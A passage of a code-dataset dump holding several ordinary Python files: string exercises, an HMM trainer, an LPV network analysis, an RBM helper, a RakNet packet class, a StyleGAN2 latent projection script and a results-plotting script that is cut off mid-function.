做區隔\n同時字串也是利用陣列的概念作存取\n\"\"\"\n\ns = \"hello\"\ns += 'world'\ns1 = s.replace('l', \"1\")\ns2 = s[0]+\"i\"\n\nprint(s, s1, s2)\n\n\"\"\"\n內建的字串分割函式 spilt非常好用,可以將字串依指定字元做切割\n\"\"\"\n\ns3 = 'I have a pen'\ns3_split=s3.split(' ')\n\nprint(s3_split)\nprint(s3_split[2])","sub_path":"practice01/test_aiyo08.py","file_name":"test_aiyo08.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"561821831","text":"from pomegranate import HiddenMarkovModel, GeneralMixtureModel, MultivariateGaussianDistribution, NormalDistribution, Kmeans\nfrom pomegranate.utils import is_gpu_enabled, disable_gpu, enable_gpu\nfrom pomegranate.callbacks import LambdaCallback, Callback\nfrom pomegranate.io import BaseGenerator, SequenceGenerator\n# from pomegranate.base import State\nimport numpy as np\nfrom ticktock import tick, tock\n\nfrom hmm_train_base import HMMTrainerBase, HMMInfo\n\nclass ModelCheckpoint(Callback):\n \"\"\"This will save the model to disk 
every n-th epoch.\"\"\"\n\n    def __init__(self, name=None, verbose=True, n=1):\n        self.model = None\n        self.params = None\n        self.name = name\n        self.verbose = verbose\n        self.n = n\n        self.endsCounter = 0\n\n    def on_epoch_end(self, logs):\n        \"\"\"Save the model to disk at the end of every n-th epoch.\"\"\"\n\n        self.endsCounter += 1\n        if(self.endsCounter % self.n == 0):\n            self._save(logs)\n            self.endsCounter = 0\n\n    def _save(self, logs):\n        \"\"\"Save the model to disk.\"\"\"\n\n        model = self.model.to_json()\n        epoch = logs['epoch']\n        name = self.name if self.name is not None else self.model.name\n\n        if self.verbose:\n            print(\"[{}] Saving checkpoint to {}.{}.json\".format(epoch, name, epoch))\n\n        with open('{}.{}.json'.format(name, epoch), 'w') as outfile:\n            outfile.write(model)\n\n    def on_training_end(self, logs):\n        self._save(logs)\n\ndef randMVG(n=40):\n    '''\n    generates a random multivariate gaussian\n    '''\n    means = np.random.randn(n)\n    # covs = np.random.rand(n, n)\n    covs = np.eye(n, n)\n    # print(covs)\n    return MultivariateGaussianDistribution(means, covs)\n\ndef randMVGMM(n=40, nmix=5, dist=MultivariateGaussianDistribution):\n    '''\n    generates a random gaussian mixture model of multivariate distributions\n    '''\n    dists = [randMVG(n=n) for _ in range(nmix)]\n    return GeneralMixtureModel(dists)\n\ndef randGaussian(n=40):\n    '''\n    generates a random normal distribution\n    '''\n    return NormalDistribution(np.random.randint(1, 10), 1)\n\nclass PomegranateTrainer(HMMTrainerBase):\n    trainerscount = 0\n    def __init__(self, gpu=False, name=None, distName=\"G\", statesNumber=3, maxIters=1000, ltr=True, nmix=5):\n        '''\n        ltr: whether the HMM is left-to-right, defaults to True\n        '''\n        super().__init__(name=\"PomegranateHMM\", statesNumber=statesNumber, maxIters=maxIters, ltr=ltr)\n        self.mname = name or f\"PomegranateTrainer{PomegranateTrainer.trainerscount}\"\n        self.nmix = nmix\n        self.statesNumber = statesNumber\n        self.distName = distName\n        self.maxIters = maxIters\n        self.ltr = ltr\n        self.gpu = gpu\n\n        if (distName not in [\"G\", \"GMM\"]):\n            raise TypeError(f\"{distName} is not a correct dist name or not yet implemented\")\n        PomegranateTrainer.trainerscount += 1\n        if(not self.gpu):\n            disable_gpu()\n        # print(\"is gpu enabled:\", is_gpu_enabled())\n\n    def train(self, data, lens, threads=1):\n        '''\n        data: observed data.\n        '''\n        if(threads != 1): raise RuntimeError(\"threads option is disabled due to low perf.\")\n        self._buildModel(data)\n        print(\"model built\")\n        data = self._reshapeFeatures(data, lens)\n        epochEndMessage = \"{}: [{}] improvement {}\"\n        self.model.fit(data, \n            callbacks=[ModelCheckpoint(n=5), LambdaCallback(on_epoch_end=lambda info: print(epochEndMessage.format(self.model.name, info['epoch'], info['improvement'])))],\n            # n_jobs=threads,\n            # algorithm=\"viterbi\",\n            min_iterations=2,\n            # lr_decay=-0.5, # default is 0\n            verbose=True,\n            stop_threshold=5e-7\n            # debug=False\n            )\n        return self # return self (the trainer) to allow chaining\n\n    def getScore(self, testData):\n        return self.model.score(testData)\n\n    def save(self, fileLocation):\n        modelAsJson = self.model.to_json()\n        with open(fileLocation, 'w') as saveFile:\n            saveFile.write(modelAsJson)\n            return fileLocation\n        return None\n\n    @staticmethod\n    def load(fileLocation):\n        with open(fileLocation) as modelFile:\n            model = HiddenMarkovModel.from_json(modelFile.read())\n            return model\n        raise RuntimeError(\"can't load the model\")\n\n    @staticmethod\n    def info(model):\n        if(not isinstance(model, HiddenMarkovModel)):\n            raise 
TypeError(\"model should be of type pomegranate.HiddenMarkovModel explicitly\")\n return HMMInfo(model.name, model.dense_transition_matrix())\n \n\n def _buildModel(self, data):\n '''\n builds the model given the data to init the distributions at good point\n data: 2d matrix every row is a vector of features\n '''\n # we want to call from_matrix(transition, dists, starts, ends)\n tm = np.zeros((self.statesNumber, self.statesNumber))\n indices = [(x,x) for x in range(self.statesNumber)]\n indices.extend( [(x,x + 1) for x in range(self.statesNumber)] )\n indices.pop() # this the item (self.statesNumber-1 , self.statesNumber) that is out of bound\n indices = np.array(indices)\n tm[indices[:, 0], indices[:, 1]] = 0.5\n tm[self.statesNumber-1, self.statesNumber-1] = 0.5 # this is the end state prob, i write it alone as we may change it specificity\n\n dists = self._initDists(data)\n\n starts = np.zeros((self.statesNumber,))\n starts[0] = 1\n\n ends = np.zeros((self.statesNumber,))\n ends[-1] = 0.5\n\n self.model = HiddenMarkovModel.from_matrix(tm, dists, starts, ends, name=self.mname)\n \n return self.model\n \n def _initDists(self, X, distribution=MultivariateGaussianDistribution):\n technique = \"R_MV-GMM\" # mixture of multivariate gaussain distribution\n if (technique == \"GMM\"):\n # gaussian mixture model\n #// uvgd = NormalDistribution.from_samples(X)\n #// gmm = GeneralMixtureModel([uvgd.copy() for _ in range(self.nmix)])\n gmm = GeneralMixtureModel.from_samples(distributions=[NormalDistribution for _ in range(self.nmix)], X=X)\n dists = [gmm.copy() for _ in range(self.statesNumber)]\n elif(technique == \"MV-GMM\"):\n # multivariate gaussian mixture model\n #// mvgd = MultivariateGaussianDistribution.from_samples(X)\n #// gmm = GeneralMixtureModel([mvgd.copy() for _ in range(self.nmix)])\n gmm = GeneralMixtureModel.from_samples(distributions=[MultivariateGaussianDistribution for _ in range(self.nmix)], X=X, n_components=3)\n dists = [gmm.copy() for _ in range(self.statesNumber)]\n elif(technique == \"MVG\"):\n self._initkmeans(X=X, numClasses=self.statesNumber)\n dists = [MultivariateGaussianDistribution.from_samples(X=X[y==i]) for i in range(self.statesNumber)]\n elif(technique == \"R_GMM\"):\n # random gaussian mixture model\n randNormal = lambda: NormalDistribution(np.random.randint(1, 10), 1)\n randGMM = lambda: GeneralMixtureModel([randNormal() for _ in range(self.nmix)])\n dists = [randGMM() for _ in range(self.statesNumber)]\n elif(technique == \"R_MV-GMM\"):\n # random multivariate gaussian mixture model\n randGMM = lambda: GeneralMixtureModel([randMVG() for _ in range(self.nmix)])\n dists = [randGMM() for _ in range(self.statesNumber)]\n return dists\n\n #* not completed:\n #! GMM-HMM-k\n y = self._initkmeans(X, self.statesNumber)\n # list(map(print, y))\n return [GeneralMixtureModel.from_samples(distribution, X=X[y==i], n_components=self.nmix) for i in range(self.statesNumber)]\n\n\n #! 
Kmeans init\n if not isinstance(X, BaseGenerator):\n data_generator = SequenceGenerator(X, None, None)\n else:\n data_generator = X\n\n initialization_batch_size = len(data_generator)\n\n X_ = []\n data = data_generator.batches()\n for i in range(initialization_batch_size):\n batch = next(data)\n X_.extend(batch[0])\n\n X_concat = np.concatenate(X_)\n if X_concat.ndim == 1:\n X_concat = X_concat.reshape(X_concat.shape[0], 1)\n n, d = X_concat.shape\n clf = Kmeans(self.statesNumber, init=\"kmeans++\", n_init=1) # init should be one of\n clf.fit(X_concat, max_iterations=None, batches_per_epoch=None)\n y = clf.predict(X_concat)\n if callable(distribution):\n if d == 1:\n dists = [distribution.from_samples(X_concat[y == i][:,0]) \n for i in range(self.statesNumber)]\n elif distribution.blank().d > 1:\n dists = [distribution.from_samples(X_concat[y == i]) \n for i in range(self.statesNumber)]\n else:\n print(\"error\")\n return dists\n\n def _initkmeans(self, X, numClasses):\n clf = Kmeans(numClasses, init=\"kmeans++\", n_init=1) # init should be one of\n clf.fit(X, max_iterations=1, batches_per_epoch=None)\n y = clf.predict(X)\n # return GeneralMixtureModel([MultivariateGaussianDistribution.from_samples(X[y == i]) for i in range(self.nmix)])\n return y\n def _reshapeFeatures(self, origData, lens):\n # TODO: consider memory enhancements at copying\n lens = np.cumsum(lens)\n lens = np.insert(lens, 0, 0, axis=0)\n return np.array([origData[int(v):int(lens[i+1])] for i,v in enumerate(lens[:-1])])\n\n\n\ndef test(data, normalize=False):\n features, lengths = data\n\n\nif __name__ == \"__main__\":\n test()\n\n","sub_path":"app/recognition/Classifier/HMM/hmm_impl/pomegranate.py","file_name":"pomegranate.py","file_ext":"py","file_size_in_byte":9827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"486980312","text":"from neuromancer.blocks import MLP\nimport torch.nn as nn\nimport torch\nimport slim\nimport scipy.linalg as LA\n\n\ndef LPV_net(fx, x):\n # nonlinearities = fx.nonlin\n x_layer = x\n x_layer_orig = x\n x_layer_A_prime = x\n W_weight = []\n W_activation = []\n W_layer = []\n i = 0\n for nlin, lin in zip(fx.nonlin, fx.linear):\n # layer-wise parameter vayring linear map\n A = lin.effective_W() # layer weight\n Ax = torch.matmul(x_layer, A) # linear transform\n if sum(Ax.squeeze()) == 0:\n lambda_h = torch.zeros(Ax.shape)\n else:\n lambda_h = nlin(Ax)/Ax # activation scaling\n lambda_h_matrix = torch.diag(lambda_h.squeeze())\n # x = lambda_h*Ax\n x_layer = torch.matmul(Ax, lambda_h_matrix)\n x_layer_orig = nlin(lin(x_layer_orig))\n\n # layer-wise parameter vayring linear map: A' = Lambda A\n A_prime = torch.matmul(A, lambda_h_matrix)\n x_layer_A_prime = torch.matmul(x_layer_A_prime, A_prime)\n print(f'layer {i+1}')\n print(x_layer_orig)\n print(x_layer)\n print(x_layer_A_prime)\n\n # network-wise parameter vayring linear map: A* = A'_L ... 
A'_1\n if i<1:\n A_star = A_prime\n else:\n # A* = A'A*\n A_star = torch.matmul(A_star, A_prime)\n i+=1\n # layer eigenvalues\n w_weight, v = LA.eig(lin.weight.detach().cpu().numpy().T)\n w_activation, v = LA.eig(lambda_h_matrix.detach().cpu().numpy().T)\n w_layer, v = LA.eig(A_prime.detach().cpu().numpy().T)\n W_weight.append(w_weight)\n W_activation.append(w_activation)\n W_layer.append(w_layer)\n # print(f'eigenvalues of {i}-th layer weights {w_weight}')\n # print(f'eigenvalues of {i}-th layer activations {w_activation}')\n # network-wise eigenvalues\n w_net, v = LA.eig(A_prime.detach().cpu().numpy().T)\n print(f'point-wise eigenvalues of network {w_net}')\n print(f'network forward pass vs LPV')\n print(fx(x))\n print(torch.matmul(x, A_star))\n return A_star, W_weight, W_activation, W_layer, w_net\n\n\nclass AutonomousSystem(nn.Module):\n\n def __init__(self, nx, hsizes, act, linearmap, sigmin, sigmax, real=True, bias=False):\n \"\"\"\n\n :param nx: state dimension\n :param hsizes: list of hidden state sizes (don't need to be the same as state dimension)\n :param act: callable elemntwise nonlinear function that operates on pytorch tensors\n :param linearmap: class which inherits from slim.linear.LinearBase\n :param sigmin: lower bound on eigenvalues\n :param sigmax: upper bound on eigenvalues\n \"\"\"\n super().__init__()\n self.fx = MLP(nx, nx, nonlin=act, Linear=linearmap, hsizes=hsizes, bias=bias, linargs={'sigma_min': sigmin,\n 'sigma_max': sigmax,\n 'real': real})\n\n def forward(self, x, nsim=1):\n As, wnets, wweights, wacts, wlayers = [], [], [], [], []\n for i in range(nsim):\n A_star, W_weight, W_activation, W_layer, w_net = LPV_net(self.fx, x)\n As.append(A_star)\n wnets.append(w_net)\n wweights.append(W_weight)\n wacts.append(W_activation)\n wlayers.append(W_layer)\n x = self.fx(x)\n return x, As, wnets, wweights, wacts, wlayers\n\n\nsquare_maps = [(slim.linear.maps['gershgorin'], -1.5, -1.1),\n (slim.linear.maps['gershgorin'], 0.0, 1.0),\n (slim.linear.maps['gershgorin'], .99, 1.1),\n (slim.linear.maps['gershgorin'], 1.1, 1.5),\n (slim.linear.maps['pf'], 1.0, 1.0),\n (slim.linear.maps['linear'], 1.0, 1.0)]\n\nmaps = [(slim.linear.maps['softSVD'], -1.5, -1.1),\n (slim.linear.maps['softSVD'], 0.0, 1.0),\n (slim.linear.maps['softSVD'], .99, 1.1),\n (slim.linear.maps['softSVD'], 1.1, 1.5),\n (slim.linear.maps['softSVD'], 1.0, 1.0),\n (slim.linear.maps['linear'], 1.0, 1.0)]\n\nif __name__ == '__main__':\n nx = 2\n # for nlayers in [1, 8]:\n # for hsize in [2]:\n # for linmap, sigmin, sigmax in maps:\n # for act in [nn.RelU, nn.SELU, nn.Tanh, nn.Sigmoid]:\n # system = AutonomousSystem(nx, [hsize]*nlayers, act, linmap, sigmin, sigmax)\n # print(system(torch.zeroes(1, nx)))\n\n for nlayers in [1, 8]:\n for linmap, sigmin, sigmax in square_maps:\n for real in [True, False]:\n for act in [nn.ReLU, nn.SELU, nn.Tanh, nn.Sigmoid]:\n system = AutonomousSystem(nx, [nx]*nlayers, act, linmap, sigmin, sigmax, real=real)\n print(system(torch.zeros(1, nx)))\n\n\n","sub_path":"neuromancer/train_scripts/papers/stability_l4dc/junk/autonomous_system.py","file_name":"autonomous_system.py","file_ext":"py","file_size_in_byte":4896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"417188412","text":"def main():\n\tqtd_testes = int(input())\n\n\tfor i in range(qtd_testes):\n\t\tpalavras = input().split(' ')\n\n\t\tpalavras.sort(reverse=True, key=len)\n\n\t\tfor palavra in palavras:\n\t\t\tprint(palavra, end=' ')\n\n\t\tprint()\n\n\nif __name__ == 
'__main__':\n\tmain()","sub_path":"Atividade_m/questao02.py","file_name":"questao02.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"424370888","text":"import numpy as np\nimport torch\nimport torch.utils.data\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\ndef spin_config(number, n_vis):\n    '''Generates a binary list from a number\n    \n    Arguments:\n    \n    :param number: any number that should be converted to a binary string\n    :type number: integer\n    :param n_vis: minimum length of the bit string (zero padded on the left)\n    :type n_vis: integer\n    :returns: list of bits\n    '''\n    spins = list(map(int, list(format(number, 'b').zfill(n_vis))))\n    spins.reverse()\n    return spins\n\ndef spin_list(n_vis):\n    '''returns a list of all possible spin configurations for n_vis spins'''\n    spins = [spin_config(number, n_vis) for number in range(2**n_vis) ]\n    spins = Variable(torch.FloatTensor(spins))\n    return spins\n\ndef overlapp_fct(all_spins, data, psi):\n    # note: relies on a module-level RBM instance named 'rbm' being defined by the caller\n    a = 0\n    for i in range(len(data)):\n        a += psi[i]*torch.sqrt(rbm.probability_of_v(all_spins, data[i]))\n    return a.data[0]\n\ndef outer_product(vecs1, vecs2):\n    '''Computes the outer product of batches of vectors\n\n    Arguments:\n\n    :param vecs1: b 1-D tensors of length m\n    :type vecs1: list of torch.Tensor or torch.autograd.Variable\n    :param vecs2: b 1-D tensors of length n\n    :type vecs2: list of torch.Tensor or torch.autograd.Variable\n    :returns: torch.Tensor or torch.autograd.Variable of size (m, n)\n    '''\n    return torch.bmm(vecs1.unsqueeze(2), vecs2.unsqueeze(1)) #batch-matrix-matrix product\n# (b x n x m) @ (b x m x p) = (b x n x p), where b is the batch size, normal matrix multiplication\n# unsqueeze(pos) gives a new dimension at position 'pos' with size one.\n# x = [1,2,3,4], x.unsqueeze(0) has shape (1,4). 
x.unsqueeze(1) has shape (4,1)\n\nclass RBM(nn.Module):\n '''Test test'''\n def __init__(self,\n n_vis=10,\n n_hin=50,\n k=5, gpu = False, continuous_visible = False, continuous_hidden = False, saved_weights = None):\n super(RBM, self).__init__()\n self.gpu = gpu\n if saved_weights is None:\n self.W = nn.Parameter(torch.randn(n_hin,n_vis)*1e-2, requires_grad = True) # randomly initialize weights\n self.v_bias = nn.Parameter(torch.zeros(n_vis), requires_grad=True)\n self.h_bias = nn.Parameter(torch.zeros(n_hin), requires_grad=True)\n else:\n self.W = saved_weights[0]\n self.v_bias = saved_weights[1]\n self.h_bias = saved_weights[2]\n self.k = k\n self.n_vis = n_vis\n self.continuous_v = continuous_visible\n self.continuous_h = continuous_hidden\n\n self.W_update = self.W.clone()\n self.h_bias_update = self.h_bias.clone()\n self.v_bias_update = self.v_bias.clone()\n\n if self.gpu:\n self.W_update = self.W_update.cuda()\n self.v_bias_update = self.v_bias_update.cuda()\n self.h_bias_update = self.h_bias_update.cuda()\n\n def v_to_h(self,v): # sample h, given v\n if (self.gpu and not v.is_cuda):\n v = v.cuda()\n p_h = F.sigmoid(F.linear(v,self.W,self.h_bias))\n # p (h_j | v ) = sigma(b_j + sum_i v_i w_ij)\n sample_h = p_h.bernoulli()\n return p_h if self.continuous_h else sample_h\n\n def h_to_v(self,h): # sample v given h\n if (self.gpu and not h.is_cuda):\n h = h.cuda()\n p_v = F.sigmoid(F.linear(h,self.W.t(),self.v_bias))\n # p (v_i | h ) = sigma(a_i + sum_j h_j w_ij)\n sample_v = p_v.bernoulli()\n return p_v if self.continuous_v else sample_v\n\n def forward(self,v): # forward is pytorch standard fct that defines what happens with input data\n if (self.gpu and not v.is_cuda):\n v = v.cuda()\n h1 = self.v_to_h(v)\n h_ = h1\n for _ in range(self.k):\n v_ = self.h_to_v(h_)\n h_ = self.v_to_h(v_)\n return v,v_\n\n def free_energy(self,v): # exp( v_bias^transp*v + sum(log(1+exp(h_bias + W*v))))\n if (self.gpu and not v.is_cuda):\n v = v.cuda()\n if len(v.shape)<2: #if v is just ONE vector\n v = v.view(1, v.shape[0])\n vbias_term = v.mv(self.v_bias) # v_bias^transp*v; should give a scalar for every element of batch\n wx_b = F.linear(v,self.W,self.h_bias) # v*W^transp + h_bias\n # wx_b has dimension batch_size x v_dim\n hidden_term = wx_b.exp().log1p().sum(1) # sum indicates over which tensor index we sum\n # hidden_term has dim batch_size\n return (-hidden_term - vbias_term) # returns the free energies of all the input spins in a vector\n\n def draw_sample(self, sample_length):\n v_ = F.relu(torch.sign(Variable(torch.randn(self.n_vis))))\n for _ in range(sample_length):\n h_ = self.v_to_h(v_)\n v_ = self.h_to_v(h_)\n return v_\n\n # -------------------------------------------------------------------------\n # TO DO (for n_hidden > 150 does not work)\n # Calculate exp( log( p(v))) to avoid exploding exponentials\n # exp ( -epsilon(v) - log(Z) )\n def partition_fct(self, spins):\n return (-self.free_energy(spins)).exp().sum()\n\n def probability_of_v(self, all_spins, v):\n epsilon = (-self.free_energy(v)).exp().sum()\n Z = self.partition_fct(all_spins)\n return epsilon/Z\n\n def train(self, train_loader, lr= 0.01, weight_decay=0, momentum=0.9):\n loss_ = []\n for _, data in enumerate(train_loader):\n if self.gpu:\n self.data = data\n else:\n self.data = Variable(data.view(-1,self.n_vis))\n # Get positive phase from the data\n self.vpos = self.data\n self.hpos = self.v_to_h(self.vpos)\n # Get negative phase from the chains\n _, self.vneg = self.forward(self.vpos) # make actual k-step sampling\n 
self.hneg = self.v_to_h(self.vneg)\n if self.continuous_h is False:\n self.continuous_h = True\n self.hneg_probability = self.v_to_h(self.vneg)\n self.continuous_h = False\n else:\n self.hneg_probability = self.v_to_h(self.vneg)\n\n self.W_update.data *= momentum\n self.h_bias_update.data *= momentum\n self.v_bias_update.data *= momentum\n\n self.deltaW = (outer_product(self.hpos, self.vpos)- outer_product(self.hneg_probability, self.vneg)).data.mean(0)\n self.deltah = (self.hpos - self.hneg_probability).data.mean(0)\n # change hneg_prob to hneg still works, but more wiggling\n self.deltav = (self.vpos - self.vneg).data.mean(0)\n # mean averages over all batches\n if self.gpu:\n self.W_update.data += (lr * self.deltaW).cuda()\n self.h_bias_update.data += (lr * self.deltah).cuda()\n self.v_bias_update.data += (lr * self.deltav).cuda()\n else:\n self.W_update.data += (lr * self.deltaW)\n self.h_bias_update.data += (lr * self.deltah)\n self.v_bias_update.data += (lr * self.deltav)\n # Update rule is W <- W + lr*(h_0 x_0 - h_k x_k)\n # But generally it is defined as W = W - v\n # Therefore v = -lr deltaW --> v in our case is W_update\n # With momentum we get v_t+1 = m*v_t + lr deltaW\n\n self.W.data += self.W_update.data\n self.h_bias.data += self.h_bias_update.data\n self.v_bias.data += self.v_bias_update.data\n\n loss_.append(F.mse_loss(self.vneg, self.vpos).data[0])\n\n","sub_path":"tools/benchmarks/pytorch/RBM_helper.py","file_name":"RBM_helper.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"501396196","text":"from pyraklib.constants import Constants\nfrom pyraklib.packets.base_packet import Packet\n\nclass OpenConnectionRequest1(Packet):\n pid = 0x05\n\n protocol = Constants.PROTOCOL\n mtu_size = None\n\n def _encode(self):\n self.put_byte(self.pid)\n self.put(Constants.MAGIC)\n self.put_byte(self.protocol)\n for i in range(0, self.mtu_size - 18):\n self.put_byte(0)\n\n def _decode(self):\n self.get()\n self.get(16) # magic bytes\n self.protocol = self.get()\n self.mtu_size = len(self.get(True)) + 18","sub_path":"pyraklib/packets/open_connection_request_1.py","file_name":"open_connection_request_1.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"138862248","text":"# Copyright 2021 Sony Corporation.\n# Copyright 2021 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport nnabla as nn\nimport nnabla.functions as F\nimport nnabla.solvers as S\n\nimport numpy as np\nimport os\nimport sys\nfrom PIL import Image\nimport subprocess as sp\nfrom tqdm import tqdm\n\nfrom .ops import *\nfrom models import *\n\nmetrics_path = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '..', '..', '..', 'utils', 'neu'))\nsys.path.append(metrics_path)\nfrom metrics.lpips.lpips import LPIPS\n\n\nclass LatentSpaceProjection(object):\n\n def __init__(self, generator, args):\n\n 
self.generator = generator\n\n self.solver = S.Adam()\n self.base_lr = 0.1\n\n self.img_size = 1024\n self.n_latent = 10000\n self.num_iters = 500\n self.latent_dim = self.generator.mapping_network_dim\n self.mse_c = 0.0\n self.n_c = 1e5\n\n self.lpips_distance = LPIPS(model='vgg')\n\n self.project(args)\n\n def set_lr(self, t, rampdown=0.25, rampup=0.05):\n lr_ramp = min(1, (1 - t) / rampdown)\n lr_ramp = 0.5 - 0.5 * np.cos(lr_ramp * np.pi)\n lr_ramp = lr_ramp * min(1, t / rampup)\n\n self.solver.set_learning_rate(self.base_lr * lr_ramp)\n\n def latent_noise(self, latent, strength):\n noise = F.randn(shape=latent.shape)*strength.data\n return noise + latent\n\n def regularize_noise(self, noises):\n loss = 0\n for noise in noises:\n size = noise.shape[2]\n while True:\n loss = (loss\n + F.pow_scalar(F.mean(noise * F.shift(noise,\n shifts=(0, 0, 0, 1), border_mode='reflect')), 2)\n + F.pow_scalar(F.mean(noise * F.shift(noise, shifts=(0, 0, 1, 0), border_mode='reflect')), 2))\n if size <= 8:\n break\n noise = F.reshape(noise, [-1, 1, size // 2, 2, size // 2, 2])\n noise = F.mean(noise, [3, 5])\n size //= 2\n return loss\n\n def normalize_noises(self, noises):\n for i in range(len(noises)):\n mean = np.mean(noises[i].d, keepdims=True)\n std = np.std(noises[i].d, keepdims=True)\n\n noises[i].d = (noises[i].d-mean)/std\n return noises\n\n def project(self, args):\n nn.set_auto_forward(True)\n\n # Input Image Variable\n image = Image.open(args.img_path).convert(\n \"RGB\").resize((256, 256), resample=Image.BILINEAR)\n image = np.array(image)/255.0\n image = np.transpose(image.astype(np.float32), (2, 0, 1))\n image = np.expand_dims(image, 0)\n image = (image - 0.5)/(0.5)\n image = nn.Variable.from_numpy_array(image)\n\n # Get Latent Space Mean and Std. Dev.\n # Get Noise for B network\n z = F.randn(shape=(self.n_latent, self.latent_dim)).data\n w = mapping_network(z)\n latent_mean = F.mean(w, axis=0, keepdims=True)\n latent_std = F.pow_scalar(F.mean(F.pow_scalar(w-latent_mean, 2)), 0.5)\n\n # Get Noise\n noises = [F.randn(shape=(1, 1, 4, 4)).data]\n\n for res in self.generator.resolutions[1:]:\n for _ in range(2):\n shape = (1, 1, res, res)\n noises.append(F.randn(shape=shape).data)\n\n # Prepare parameters to be optimized\n latent_in = nn.Variable.from_numpy_array(\n latent_mean.data).apply(need_grad=True)\n noises = [nn.Variable.from_numpy_array(\n n.data).apply(need_grad=True) for n in noises]\n\n constant_bc = nn.parameter.get_parameter_or_create(\n name=\"G_synthesis/4x4/Const/const\",\n shape=(1, 512, 4, 4))\n constant_bc = F.broadcast(constant_bc, (1,) + constant_bc.shape[1:])\n\n pbar = tqdm(range(self.num_iters))\n for i in pbar:\n\n t = i/self.num_iters\n self.set_lr(t)\n\n noise_strength = latent_std * 0.05 * max(0, 1 - t / 0.75) ** 2\n latent_n = self.latent_noise(latent_in, noise_strength)\n\n gen_out = self.generator.synthesis(\n [latent_n, latent_n], constant_bc, noises_in=noises)\n N, C, H, W = gen_out.shape\n factor = H//256\n gen_out = F.reshape(\n gen_out, (N, C, H//factor, factor, W//factor, factor))\n gen_out = F.mean(gen_out, axis=(3, 5))\n\n p_loss = F.sum(self.lpips_distance(image, gen_out))\n n_loss = self.regularize_noise(noises)\n mse_loss = F.mean((gen_out-image)**2)\n loss = p_loss + self.n_c*n_loss + self.mse_c*mse_loss\n\n param_dict = {'latent': latent_in}\n for i in range(len(noises)):\n param_dict[f'noise_{i}'] = noises[i]\n self.solver.zero_grad()\n self.solver.set_parameters(\n param_dict, reset=False, retain_state=True)\n\n loss.backward()\n 
self.solver.update()\n\n noises = self.normalize_noises(noises)\n\n pbar.set_description(f'Loss: {loss.d} P Loss: {p_loss.d}')\n\n save_generations(image, 'original.png')\n\n gen_out = self.generator.synthesis(\n [latent_n, latent_n], constant_bc, noises_in=noises)\n N, C, H, W = gen_out.shape\n factor = H//256\n gen_out = F.reshape(\n gen_out, (N, C, H//factor, factor, W//factor, factor), inplace=True)\n gen_out = F.mean(gen_out, axis=(3, 5))\n save_generations(gen_out, 'projected.png')\n\n nn.save_parameters('projection_params.h5', param_dict)\n","sub_path":"image-generation/stylegan2-training/execution/projection.py","file_name":"projection.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"523363073","text":"import re\n# import numpy as np\nimport pandas as pd\nimport glob\nimport matplotlib.pyplot as plt\n# import matplotlib.gridspec as gridspec\n\n# Repos\nTESTS = '../labeled_data/all_tests'\nRESULTS = TESTS + '/*/*/*_results.txt'\nFEATURES = TESTS + '/*/*/*_features.txt'\nTRAINING = TESTS + '/*/*/*_iterations.txt'\n\n\ndef build_feature_dictionary(files):\n '''Gets the feature sets for each test '''\n for file_in in files:\n ext = file_in.split('/')\n test_number = ext[3]\n optimization = ext[4]\n reference_number = ext[-1][0]\n text_wrapper = open(file_in, 'r')\n\ndef build_result_df(files):\n '''Builds dataframe of the result files'''\n df_list = []\n for file_in in files:\n ext = file_in.split('/')\n test_number = ext[3]\n optimization = ext[4]\n reference_number = ext[-1][0]\n text_wrapper = open(file_in, 'r')\n text_list = text_wrapper.readlines()\n split_list = [s.split() for s in text_list]\n frame = list(filter(None, split_list))\n columns = frame.pop(0)\n index = [l.pop(0) for l in frame]\n frame[4].remove('avg')\n frame[3].remove('avg')\n frame[2].remove('avg')\n\n df = pd.DataFrame(data=frame, index=index, columns=columns)\n df['opt'] = optimization\n df['reference'] = int(reference_number)\n df['test'] = test_number\n df['recall'] = df['recall'].astype('float')\n df['precision'] = df['precision'].astype('float')\n df['f1-score'] = df['f1-score'].astype('float')\n df['support'] = df['support'].astype('int32')\n df_list.append(df)\n end_frame = pd.concat(df_list, axis=0)\n return end_frame\n\n\ndef plot_results(results):\n '''Plots graphs for the results of each test set'''\n fig, ax = plt.subplots(3, 3)\n ncol = 0\n for test in results:\n nrow = 0\n for ind, obj in test.groupby('reference'):\n y_list = ['f1-score', 'precision', 'recall']\n ax1 = obj.plot.bar(x='opt', y=y_list, ax=ax[nrow, ncol])\n ax1.set_xlabel('')\n ax1.tick_params(axis='x',labelrotation=.25)\n nrow = nrow + 1\n ncol = ncol + 1\n\n ax[0, 0].\\\n set_title('Testing Phase 1: No Sentiment', fontsize='x-small')\n ax[0, 1].\\\n set_title('Testing Phase 2: Token Level Sentiment', fontsize='x-small')\n ax[0, 2].\\\n set_title('Testing Phase 3: n-level Sentiment', fontsize='x-small')\n ax[0, 0].set_ylabel('Unigram')\n a1t = ax[0, 2].twinx()\n a1t.set_ylabel('n sentiment')\n ax[1, 0].set_ylabel('Trigram')\n a2t = ax[1, 2].twinx()\n a2t.set_ylabel('n-1, n+1 sentiment')\n a3t = ax[2, 2].twinx()\n a3t.set_ylabel('n-2, n+2 sentiment')\n ax[2, 0].set_ylabel('5-gram')\n fig.suptitle('Test Results by Test 